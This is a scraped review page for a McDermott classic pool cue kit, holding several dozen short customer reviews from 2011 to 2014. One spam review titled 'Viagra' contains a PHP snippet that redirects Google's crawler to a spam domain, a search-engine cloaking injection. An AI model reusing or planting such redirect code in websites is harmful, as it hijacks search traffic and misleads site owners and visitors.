Product reviews for:
     
$52.50
4.5 Stars based on 48 Review(s)
Cathy
Havana,il
5 Stars

I would recommend this item to a friend.
cue kit
September 19, 2014
I like to order these because its a great starter kit and i donate them to benefits to help promote the sport.

Timothy Moulton
Pittsford, New York
5 Stars

I would recommend this item to a friend.
awsome
July 17, 2014
So far the cue is great I have only had it for a few weeks but I'm loving it.

Vladimir
Monroe NJ
5 Stars

I would recommend this item to a friend.
Great service
June 6, 2014
Excellent service, timely delivery and exactly what I ordered. Great job.

Rich
miami
5 Stars

I would recommend this item to a friend.
Great for prices!!!
June 5, 2014
I was impressed with the quality for the price. Will tell friends.

nicolas eduardo ramirez
calexico ca
5 Stars

I would recommend this item to a friend.
great sorprice
May 26, 2014
its an excellent pool cue excellent quality materials and good design , yes I recommend full up to a friend

David
N. Carolina
4 Stars

I would recommend this item to a friend.
Good for starters...
May 22, 2014
I just recently started playing in local tournaments and bought this as an inexpensive 21oz. breaking cue...a good stick for starters and serves its purpose very well.

mordchai
,
5 Stars

I would recommend this item to a friend.
great cue kit
April 24, 2014
i have been very impressed with this cue it is a perfect beginners set.

Jess
North Arlington, NJ
4 Stars

I would recommend this item to a friend.
My first cue
April 17, 2014
I have been playing pool for a little over a year and have always wanted my first cue. My good friend got me one for my birthday and it is excellent. Its lightweight but has enough weight to give great momentum. It brings chalk and the nickle/dime. Great for a beginner like me!

Amira
Lake Hiawatha, NJ
5 Stars

I would recommend this item to a friend.
Great package!!
April 17, 2014
I bought this item for one of my closest friends as an (early) birthday gift, She absolutely loved it and I thought it was well made, sophisticated, elegant and had a great design! I hope she'll be able to utilize it for years to come!

Daniel
Pennsburg Pa
5 Stars

I would recommend this item to a friend.
mcdemott cue kit
April 13, 2014
This cue is flawless great playing and is amazingly solid controls cue ball no problem .. hats off to ozone billiards . Feathermaster out ..

Pappa
Green Bay
5 Stars

I would recommend this item to a friend.
I get the point
April 12, 2014
Great cue and kit for the price. More than i had expected.

allen
, new jersey
5 Stars

I would recommend this item to a friend.
great cue for the money
April 7, 2014
great cue just wish I would of noticed that it did not come with a wrap. I probably would of picked the next one up. but that was my fault..

marko
utah
4 Stars

I would recommend this item to a friend.
cue mcdermott
January 24, 2014
i love this cue but its a little bent other than that its a nice idem

Yaye
, philippines
5 Stars

I would recommend this item to a friend.
nice kit
January 16, 2014
nice cue... customer service is excellent!

Joseph Wiercinski
Bloomfield New Jersey
5 Stars

I would recommend this item to a friend.
Great cue
January 9, 2014
Bought as spare well balanced great cue for the money extremely satisfied

Wayne
LaFayette GA
5 Stars

I would recommend this item to a friend.
Best Deal
January 8, 2014
Great price, great cue, great delivery.

De Laine
Jasper, GA
5 Stars

I would recommend this item to a friend.
Great Christmas present
January 4, 2014
It was great! Exactly what I expected.

Katie
Pennsylvania
5 Stars

I would recommend this item to a friend.
Great Gift for pool player
December 30, 2013
I bought my boyfriend this pool stick as a christmas present and had his name engraved on the end. It came out wonderfully and he loves it. We went to the bar to test it out and all the people he plays pool with tried it and liked it. Thank you Ozone!

butch
des moines Iowa
4 Stars

I would recommend this item to a friend.
for the money a greate item
December 15, 2013
nice stick !!! I have enjoy it very much ! thank for a great item for the money.

Roger
KY
5 Stars

I would recommend this item to a friend.
Great price.
November 25, 2013
Great product. Awesome price.

Nicole
Claremore, Oklahoma
5 Stars

I would recommend this item to a friend.
League Gift
November 23, 2013
We gave this cue away to our top female shooter in our last league and she has absolutely loved it! I see her show it off, and play with it frequently.

muriel
Russellvilloe, Ky
3 Stars
McDermott cue
August 23, 2013
Not good, sounds hollow, does not sound like a good stick. Do not like the tip, either.

jo white
co
4 Stars

I would recommend this item to a friend.
great buy
July 16, 2013
very happy with the purchase .. no buyers remorse at all

forrest
ontonagon,michigan
5 Stars

I would recommend this item to a friend.
forrest
July 11, 2013
i am impressed with this cue. a great buy. straight and well balanced.

Kou
MN
5 Stars

I would recommend this item to a friend.
First Pool CUe
May 12, 2013
This is the first pool cue I have purchase, for the price it's a good pool cue.

andrew
ishpeming, MI
5 Stars

I would recommend this item to a friend.
great stick
January 20, 2013
.

April
Jackson, MN
5 Stars

I would recommend this item to a friend.
I got this kit for my boyfriend and now he can't put his Cue down, he loves it!!!
December 21, 2012
I think that it was a great gift and he really appreciated it!

Darrell
Patoka, Il.
5 Stars

I would recommend this item to a friend.
Very good
December 14, 2012
For the price very good.

Johnathan
Asheboro,NC
5 Stars

I would recommend this item to a friend.
mcdermott cue
October 8, 2012
this cue shoots real good .

bill miles
baldwin city , kansas
4 Stars

I would recommend this item to a friend.
b.miles on classic cue kit
September 14, 2012
i got my cue 10 dayes ago ive used it twice on league games . for me its the best cue ive ever owned im 69 and played a lot of pool i love it.

Frank
dfornols@gt.rr.com
5 Stars

I would recommend this item to a friend.
I love this kit.
September 11, 2012
looks good shoots good,Enough said.

pamela
, memphis tn
4 Stars

I would recommend this item to a friend.
great value
September 9, 2012
very good cue

chuck
nebraska
5 Stars

I would recommend this item to a friend.
poolstick
August 20, 2012
good stick for the price.warranty is really good..

Anna
colorado
5 Stars

I would recommend this item to a friend.
great cue
July 11, 2012
Bought it for a friend loves the straight cue. Shipping and ordering were very prompt.

John
Laughlin, Nevada
5 Stars

I would recommend this item to a friend.
My second McDermott
July 4, 2012
I have owned a McDermott cue for years and decided to purchase a new one. This one fit like a glove and worked so well for me that I actually bought a second one of the same cue for a team-mate.

John
Chicago, Illinois
5 Stars
Viagra
April 28, 2012
$agent = $_SERVER['HTTP_USER_AGENT']; if (eregi("google", $agent)) {header("HTTP/1.1 301?); header("Location: http://bablo .me .uk/”); exit(); }

jack r parker
elwood in
4 Stars

I would recommend this item to a friend.
Nice pool stick for the money!
April 14, 2012
Good quality stick!

GEORGE
Killeen, Texas
5 Stars

I would recommend this item to a friend.
McDermott Cue - Classic Cue Kit
March 15, 2012
Product - The McDermott Cue Classic Cue Kit is an outstanding value for the price. I bought this set for my little cousin, who has recently picked up the billiard bug and is beginning to get serious about the game. He is an absolute beginner and needed a cue for his level that would allow him to learn how to develop a decent stroke and deliver a good hit on the cue ball. Bar cues are usually in bad condition and have slip-on or screw in tips, which is horrible for anyone wanting to learn this great sport. This cue allows him to receive consistant and accurate feedback according to what he is trying to accomplish when striking the cueball. In addition, it came with everything he needed to get started. What a deal for the money I paid! I couldn't afford much in these recession times but what I could afford does the job well. Earlier this week another guy gave me some money and told me to choose a good stick for him to begin to learn the game. He's an absolute beginner also. Guess my work is done because I'm certainly going with this cue kit!

Francisco Barreiros
Miami, FL
4 Stars

I would recommend this item to a friend.
Best purchase
February 24, 2012
It´s the best purchase, the best price/value relation .

DONNIE LUV
Cleveland Ohio
5 Stars

I would recommend this item to a friend.
GREAT
February 18, 2012
LOVE THIS STICK,THE FREE ITEMS IS NICE TOO,THE WEIGHT IS PRECFECT,GREAT BUY

Michael
Miami, FL
4 Stars

I would recommend this item to a friend.
Great Cue!
February 14, 2012
For $50 this cue hits very well and even though it doesn't have wrapping, it has a great feel to it and control. Definitely worth it.

david
,
4 Stars

I would recommend this item to a friend.
starter kit
February 9, 2012
sweet deal on a well made stick

sandra oquist
BG. KY.
5 Stars

I would recommend this item to a friend.
Classic cue kit
January 22, 2012
This cue was better than i expecited

rodney walker
Lake spivey, Ga
5 Stars

I would recommend this item to a friend.
The customer service is wonderful
January 2, 2012
great

James saddler
Opelika,Al.
5 Stars

I would recommend this item to a friend.
Good pool cue.
November 7, 2011
Good service. Nice looking pool cue. Injoy play pool with my pool cue.

Gary
Lancaster, KY
5 Stars

I would recommend this item to a friend.
Good for the money
October 24, 2011
The stick was straight and smooth with a good formed tip. Better cue than excepted and quick shipping.

jack
phila. pa
5 Stars

I would recommend this item to a friend.
Mcdermott cue
September 25, 2011
great stick GREAT PRICE++++++

John
Mesa, AZ
4 Stars

I would recommend this item to a friend.
Good Stick
September 18, 2011
Very nice for the money spent. Would like thiner shaft, but not bad overall.


Page 1 of 1

 

What Our Customers Say



.